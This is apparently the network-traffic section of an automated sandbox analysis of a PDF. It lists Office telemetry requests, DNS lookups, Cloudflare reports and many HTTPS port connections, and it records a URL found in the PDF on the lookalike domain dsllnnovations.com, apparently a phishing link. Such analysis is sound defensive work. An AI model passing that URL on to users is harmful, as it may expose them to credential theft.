Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: dsllnnovations.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: unknownHTTP traffic detected: POST /report/v4?s=juk1jZp%2F50rc8sadSn%2BJEC3ihwPx978HFKpo4QDgdXrM2EFBmJgsXMcbs%2Bs52VXQpVkKwzsMTAnVKul0JdNxLj%2BGR2DhquxoLhGIGhVP%2Fh8hdyaHiu2qOqK3wBcu0vWS2yvT%2BCQ%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 395Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 29 Oct 2024 23:22:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Content-Type-Options: nosniffX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-XSS-Protection: 1; mode=blockCache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutablePragma: publicCF-Cache-Status: HITAge: 536356Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2BadovzQ5hoW%2FvOxGQpdTWBrzUXP9pS801ARFBreA8pYNxdqGCm4KOVIyuXiMGzX7J9hOBjhkLkhVfoaZEb4JcLnj%2BCs9CZoXgY22Wze5CYYRoVNVO%2FUnat3LdOPTR0IpMrji7g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8da6e830bf804696-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1194&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1434&delivery_rate=2427493&cwnd=251&unsent_bytes=0&cid=af9448911ec17344&ts=162&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 23:22:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Content-Type-Options: nosniffX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-XSS-Protection: 1; mode=blockcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oDusOe7fSJjigxaS2PHB1yTwoqOj7K9ywodW2zoPajEeNvaVqjaPLTfz2Y3eo74gRvJAdSQzfjNUezKDZdVjTnAIm16n1PyEEgwoAoVJ%2BQzGZy0eLZtDBvaP5lcwtHaqtztPvzs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8da6e8395f456b4c-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1286&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1670&delivery_rate=2273155&cwnd=233&unsent_bytes=0&cid=09d289685fba52ab&ts=808&x=0"
Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.drString found in binary or memory: http://x1.i.lencr.org/
Source: completedfiles.....pdfString found in binary or memory: https://dsllnnovations.com/aith/)
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 58295 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58272 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58111 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58219
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58216
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58215
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58218
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58217
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58223
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58222
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58225
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58103
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58224
Source: unknownNetwork traffic detected: HTTP traffic on port 58317 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58100
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58221
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 58192 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58305 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 61351 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58225 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58181 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58109
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58227
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58226
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58229
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58107
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58228
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58234
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58233
Source: unknownNetwork traffic detected: HTTP traffic on port 58065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58236
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58114
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58235
Source: unknownNetwork traffic detected: HTTP traffic on port 58283 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 61339 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58230
Source: unknownNetwork traffic detected: HTTP traffic on port 58122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58111
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58232
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58231
Source: unknownNetwork traffic detected: HTTP traffic on port 58214 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58249 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58306 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58157 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58226 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58238
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58116
Source: unknownNetwork traffic detected: HTTP traffic on port 58146 -> 443
